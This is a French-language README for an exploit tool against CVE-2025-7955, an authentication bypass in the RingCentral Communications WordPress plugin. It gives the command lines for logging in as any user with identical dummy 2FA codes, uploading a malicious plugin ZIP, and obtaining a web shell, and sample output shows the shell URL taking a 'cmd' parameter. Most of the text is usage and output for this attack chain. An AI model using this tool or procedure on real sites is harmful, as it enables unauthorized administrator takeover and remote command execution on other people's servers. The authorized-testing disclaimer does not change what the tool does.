
RingCentral Communications 1.5 - 1.6.8 - Absence de vérification côté serveur menant à un contournement de l'authentification via la fonction ringcentral_admin_login_2fa_verify
RingCentral Communications 1.5 - 1.6.8 - Absence de vérification côté serveur menant à un contournement d'authentification via la fonction ringcentral_admin_login_2fa_verify
CVE : CVE-2025-7955
Plugin concerné : RingCentral Communications (WordPress)
Versions concernées : 1.5 – 1.6.8
Score CVSS : 9.8 (Critique)
Type : Contournement d'authentification (absence de vérification côté serveur)
Le plugin WordPress RingCentral Communications est vulnérable à un contournement d'authentification en raison d'une validation inappropriée dans la fonction
ringcentral_admin_login_2fa_verify(). Les versions 1.5 à 1.6.8 permettent à des attaquants non authentifiés de se connecter en tant que n'importe quel utilisateur en fournissant simplement des codes factices identiques.
Cet exploit automatise toute la chaîne d'attaque pour CVE-2025-7955. Il est conçu pour :
/wp-json/wp/v2/users/ID).whoami via le shell et affiche la sortie.Préparez votre plugin malveillant
Assurez-vous que votre fichier ZIP de plugin malveillant (par défaut : Nxploit.zip) se trouve dans le même répertoire que le script.
Exécutez l'exploit :
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (obligatoire) URL du site WordPress cible-user, --username : (facultatif) Nom d'utilisateur pour se connecter (découvert automatiquement s'il est omis)-id, --id_admin : (défaut : 1) Identifiant utilisateur (l'admin est généralement l'ID 1)-z, --zip : (défaut : Nxploit.zip) Chemin vers le ZIP du plugin malveillantExemple :
python3 CVE-2025-7955.py -u http://target/wordpress
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 Exploit By : Nxploited
[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
Cet outil est destiné uniquement aux tests de sécurité autorisés et à un usage éducatif.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce script.
Par : Khaled Alenazi (Nxploited)
ou spécifiez le nom d'utilisateur/ID :
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1